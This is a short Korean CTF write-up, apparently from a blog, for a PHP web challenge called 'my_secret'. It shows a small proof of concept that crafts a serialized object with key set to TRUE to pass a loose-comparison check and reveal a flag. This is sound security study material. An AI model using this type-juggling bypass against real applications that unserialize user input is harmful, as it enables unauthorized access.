
[ H4C Game ] 웹 풀어보기
sangjun
·2022. 3. 26. 00:32
반응형
1. my_secret
- php unserialize취약점도 아닌듯
- php unserialize취약점 트리거 조건을 만족하지 않는다.
1. 매직 메소드를 구현한 클래스가 있어야 함
2. 모든 클래스는 취약한 unserialize()가 호출되기 전에 선언되어야 한다.
- 그냥 객체를 새로 만들어 줄 수가 있는데 이것으로 $obj->key == I_am_robot 여길 우회해야 한다.
- 느슨한 비교를 우회 해야된다.
- 아래와 같이 poc를 만들어 보니까 되서 리모트도 됐다.
- 이참에 느슨한 비교와 엄격한 비교를 공부해보자.
<?php
$flag="test_flag";
// class obj{
// var $pass = "I_WANT_FLAG";
// var $key = "TOP SECRET";
// }
class obj{
var $pass = "I_WANT_FLAG";
var $key=TRUE;
}
$obj = new obj;
//$sol = $_GET["sol"];
echo serialize($obj);
//$obj = unserialize($sol);
// if(isset($obj->key))
// echo $obj->key;
if(isset($obj->pass)){
if($obj->key == 1){
echo "<br \>oh! you are access my secret<br>";
echo "<h1>".$flag."</h1>";
}
}
?>
- 공부할게 없다 이 표를 참고해서 알잘딱깔센으로 페이로드 만들면 된다.
반응형
'War Games > ctf-review' 카테고리의 다른 글
[ AngstromCTF 2022 ] CTF 딱 1년 차 (2) | 2022.05.05 |
---|---|
[ H4C Game ] 웹 풀어보기 (0) | 2022.03.26 |
2022 Kaist GON CTF (0) | 2022.03.23 |
코드게이트 2022라업 VIMT (0) | 2022.02.28 |
[ CSAW CTF 2021 ] word_games (0) | 2021.09.13 |
[ CSAW CTF 2021 ] procrastination-simulator (0) | 2021.09.13 |
0개의 댓글